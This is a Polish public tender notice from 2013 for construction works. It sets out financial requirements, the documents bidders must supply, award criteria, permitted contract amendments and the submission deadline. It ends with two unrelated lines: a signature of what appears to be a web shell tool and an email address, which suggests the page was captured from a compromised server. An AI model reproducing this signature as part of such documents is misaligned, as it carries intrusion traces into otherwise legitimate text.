<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca udowodni, iż posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 500 000 zł.
Wykonawca, jako dowód, przedłoży informację banku lub spółdzielczej kasy oszczęd-nościowo - kredytowej, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upły-wem terminu składania ofert w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy zgodnie w treści z załącznikiem nr 1 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy, które zostaną wprowadzone do zapisów umowy o zamówienie
1.	Istotne postanowienia umowy określa wzór umowy stanowiący załącznik nr 9 do 
SIWZ.
2.	Wszelkie zmiany umowy dla swej ważności wymagają zachowania formy pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu Stron.
3.	 Zmiany te zgodnie z zapisami art. 140 ust. 3 ustawy PZP nie mogą wykraczać poza określenie przedmiotu zamówienia zawartego w SIWZ. W szczególności Zamawiający, dopuszcza:
3.1.	zmianę cen w przypadku urzędowej zmiany stawki podatku od towarów i usług VAT,
3.2.	zmianę terminu realizacji przedmiotu zamówienia w przypadku wystąpienia oko-liczności niezależnych od stron, np.:
1)	siły wyższej,
2)	działań osób trzecich uniemożliwiających realizację przedmiotu umowy,
3)	wykrycia w miejscu prowadzenia robót niezinwentaryzowanych urządzeń lub sieci podziemnych,
4)	odnalezienia na terenie działki lub w jej bezpośrednim pobliżu niewybuchów lub stanowisk archeologicznych, szczątków ludzkich,
5)	wstrzymania lub nieterminowego finansowania inwestycji przez właściwego dys-ponenta środków sfery budżetowej,
6)	z przyczyn będących następstwem działania organów administracji,
7)	przestojów i opóźnień zawinionych przez Zamawiającego.
3.3.	zmianę zakresu robót i wynagrodzenia za jego wykonanie w przypadku:
1)	wykrycia w miejscu prowadzenia robót niezinwentaryzowanych urządzeń lub sieci podziemnych,
2)	odnalezienia na terenie działki lub w jej bezpośrednim pobliżu niewybuchów lub stanowisk archeologicznych,
3)	zmiany sposobu wykonania robót z uwagi na ewentualną zmianę projektu bu-dowlanego i wykonawczego z przyczyn niezależnych od stron.
Wynagrodzenie za wykonanie robót nieprzewidzianych (dodatkowych) lub zamien-nych zostanie obliczone na podstawie kosztorysu sporządzonego przez Wykonawcę   w oparciu o informator cenowy Sekoncebud właściwy dla okresu realizacji robót. Kosztorys będzie podlegał weryfikacji i negocjacjom w ramach procedury zlecania robót dodatkowych lub/i zamiennych.
3.4.	zmianę osób przewidzianych do realizacji zamówienia pod warunkiem, iż osoba za-stępująca posiada kompetencje odpowiadające wymaganiom SIWZ.
4.	Istotnej zmiany postanowień umowy nie stanowi między innymi: 
4.1.	aktualizacja danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę formy prawnej itp.;
4.2.	zmiana formy zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cpd.bip.msw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> CENTRUM PERSONALIZACJI DOKUMENTÓW MSW
UL. PAWIŃSKIEGO 17/21, 02-106 WARSZAWA
KANCELARIA OGÓLNA (POKÓJ NR 19).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2013 godzina 10:00, miejsce: CENTRUM PERSONALIZACJI DOKUMENTÓW MSW
UL. PAWIŃSKIEGO 17/21, 02-106 WARSZAWA
KANCELARIA OGÓLNA (POKÓJ NR 19).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com